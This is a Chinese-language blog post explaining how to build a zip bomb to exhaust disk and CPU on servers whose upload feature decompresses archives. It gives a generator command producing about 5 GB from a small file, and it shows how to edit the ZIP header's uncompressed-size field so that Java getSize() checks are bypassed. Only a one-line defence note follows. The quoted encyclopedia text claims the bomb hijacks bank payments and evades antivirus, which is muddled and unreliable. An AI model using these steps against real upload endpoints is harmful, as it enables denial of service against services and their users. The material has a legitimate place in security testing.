压缩炸弹(zipbomb)制作（附演示）

来自百度百科的介绍：

压缩包炸弹英文为Arc.Bomb，是一款压缩包病毒。它通常只有几百KB，但是解压后会变成上百MB的庞然大物。它能劫持网银支付链接，把网购交易资金劫持到黑客账户（还能这样搞？什么原理…欺骗杀毒软件一直陷入扫描中..然后部署病毒？.）。它能够利用特殊的技术逃过杀毒软件的云查杀系统。

一般来说，压缩文件的压缩比，就是压缩文件大小和解压缩之后文件大小的比例，超过20倍，一些杀毒即报告为压缩包炸弹，或者叫解压缩炸弹。因为一般压缩文件不会直接感染系统，而扫描压缩文件会减缓扫描速度，所以一般杀毒软件都会规定压缩比。

同理还有压缩文件嵌套层数，一般杀毒软件会根据自身的需要进行设置，比如说小红伞是24层，而ESET NOD32为10层。
为什么木马病毒要以“压缩炸弹”这样的形式发布呢?是因为木马作者对木马进行了特殊的加壳处理，使木马程序压缩至极致。而在解压的过程中，由于压缩率的不同，解压出来的文件大小也会不同，这样就能轻易躲过杀毒软件的“云查杀”系统。这可以说是一种很强大的免杀方式，是以后病毒和木马的主流

顺便参考http://www.sohu.com/a/250882983_355019

最近看到资料有说到ZIP炸弹，主要在存在上传功能且对上传文件有解压动作的地方，如果校验不严，可能导致压缩炸弹，导致消耗CPU导致宕机

1、生成ZIP炸弹：

https://github.com/CreeperKong/zipbomb-generator

python3 zipbomb.py --mode=quoted_overlap --num-files=250 --compressed-size=21179 > zbsm.zip

–num-files ：压缩包包含的文件数量

–compressed-size：文件压缩大小

可以看到生成了一个zbsm.zip的压缩包，其中包含250个约20M大小的子文件，全部解压出来即有5G的大小，如果可以重放，则瞬间可填满硬盘

使用脚本查看解压后的大小：

python3 ratio.py zbsm.zip

linux下还可以使用dd命令 以及bzip2命令

2、场景：

有些上传处使用了如：

Java.util.jar.jarfile

Java.util.zip.Zipfile

通过 java.util.zip.ZipEntry.getSize()获取解压后的大小，可使用010editor对zip文件进行编辑：

struct ZIPFILERECORD record 为文件名；
uint frUncompressedSize为解压后的文件大小；

此处我们对uint frUncompressedSize进行修改，可绕过对解压后实际大小的判断:

如，我们修改uint frUncompressedSize大小为111：

利用java.util.zip进行解压后文件大小判断：

（java代码渣，求勿喷）

import java.io.*;
import java.util.zip.ZipEntry;
import java.util.zip.*;
public class Main {

    public static void main(String[] args) {
        File mfile = new  File("D:/05-MY-PROGRAM/m_java/zipboom/zbsm.zip");
        try {
            ZipFile zipFile = new  ZipFile(mfile);
            InputStream in=new BufferedInputStream(new FileInputStream(mfile));
            ZipInputStream zin=new ZipInputStream(in);
            ZipEntry ze;
            ze=zin.getNextEntry();
            System.out.println("ZIP'Size is :" + ze.getSize());
        }catch (Exception  e)
        {
            e.getStackTrace();
        }

    }
}

3、防御：

对上传zip文件进行文件个数、文件大小等进行判断

另参考：

https://www.bamsoftware.com/hacks/zipbomb/